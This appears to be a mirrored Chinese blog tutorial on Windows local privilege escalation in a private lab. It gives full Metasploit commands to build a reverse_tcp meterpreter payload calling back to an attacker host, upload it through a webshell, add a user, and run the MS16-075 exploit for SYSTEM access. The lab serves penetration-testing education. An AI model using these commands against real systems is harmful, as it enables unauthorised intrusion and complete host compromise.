zoukankan      html  css  js  c++  java
  • Windows本地提权

    前言

    window本地漏洞提权,是指利用Windows系统本地进程或系统服务的漏洞,将普通用户权限(Sql Server、.net framework)权限提示至system权限

    提权的原理

    当你使用当前用户的权限来创建的shell通信,你当前的shell就是什么权限,就好像你使用管理员运行一个木马文件,对方获得权限就是管理员,而Windows本地溢出就是利用system权限的缺陷开启shell进程,相对应的就可获得system权限。

    实验环境

    Windows server 2008 + SQL Server 2014 + IIS 7 IP:192.168.233.135

    kali Linux 2020 IP:192.168.233.130
    Windows 10 IP:192.168.233.1(中国蚁剑环境)

    使用MSF对漏洞进行提权操作

    存在webshell,普通权限
    1.查看当前webshell权限,普通IIS权限,尝试添加用户失败

    whoami
    
    net user admsdf admin123 /add
    


    systeminfo查看系统补丁情况

    systeminfo
    


    将查出来的补丁号放置在网站中查询存在的溢出漏洞 https://bugs.hacking8.com/tiquan/

    找到选择一个可以在机器上使用的漏洞编号,暂时记录,待会会用

    2.打开kali,使用msf生成Windows msf远控木马,并监听端口
    查看当前ip地址:

    ifconfig
    


    生成meterpreter木马(生成更多木马文件请参考https://www.cnblogs.com/tianlinlin/p/10171981.html)

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.233.130 LPORT=1233 -f exe > shell.exe
    


    启动msf框架,选择监听模块

    msfconsole
    use exploit/multi/handler
    


    设置接收反弹的payload类型,设置要监听的ip的端口 记得监听的端口和地址需要和生成木马的端口及ip地址相对应

    set payload windows/meterpreter/reverse_tcp
    set lport 1233
    set lhost 192.168.233.130
    options
    


    开启监听(在开启监听前记得options查看一下当前的配置是否与生成的木马参数是否一致哦)

    run
    


    3.使用webshell将木马上传到网站目录,并使用终端运行,成功获得meterpreter shell
    将shell从kali复制到物理机,使用蚁剑上传webshell

    上传成功

    右击,选择在此处打开虚拟终端,选择刚刚的shell.exe,回车运行

    查看kali虚拟机,成功获得反弹shell,getuid查看当前用户

    getuid
    


    4.使用msf中post模块中ms16-075尝试本地溢出(郑重提示,如果是本地环境测试可以多尝试几下,如果是正式渗透测试,使用exp的时候一定先要看说明或者readme,不然很有可能造成目标蓝屏关机等情况
    sysinfo确定目标架构 Windows 2008 server,x64位系统(Windows下执行systeminfo也可以查看)

    sysinfo
    


    将环境调至后台运行,(注意弹出的session id待会要用)选择刚刚对比已经安装过的补丁,尝试使用未安装补丁的exp进行攻击(MS16-075)

    background
    search ms16-075
    


    选择其中的一个模块进行测试(我本机短长度exp测试失败了,我觉得主要原因是看不懂注释),可以看到,payload已经帮我们默认选好了(windows/meterpreter/reverse_tcp),payload中的选项也自带填好了。大家的如果没有就手动set选择填一下吧

    use exploit/windows/local/ms16_075_reflection_juicy 
    options
    


    选择必选项session,将我们刚刚的sessionID放进去,run启动exp

    set session 2
    run
    


    漏洞利用成功,这时候getuid查看权限也就是system权限了

    本篇文章到此就结束了,有错误的希望多读指正,留言即可哦

  • 相关阅读:
    无法启动调试--未安装 Silverlight Developer 运行时。请安装一个匹配版本。
    jQuery导航菜单防刷新
    IE6下Png透明最佳解决方案(推荐) Unit PNG Fix
    每周进步要点(第50周12.4-12.11)
    学习笔记:重塑你的自我驱动力
    学习笔记之是什么决定我们的命运
    读书《万万没想到 3》
    人与人之间的鄙视链是如何形成的?
    第7本《万万没想到-用理工科思维理解世界2》
    中明写公众号的时候他在想什么
  • 原文地址:https://www.cnblogs.com/KHZ521/p/14088391.html
Copyright © 2011-2022 走看看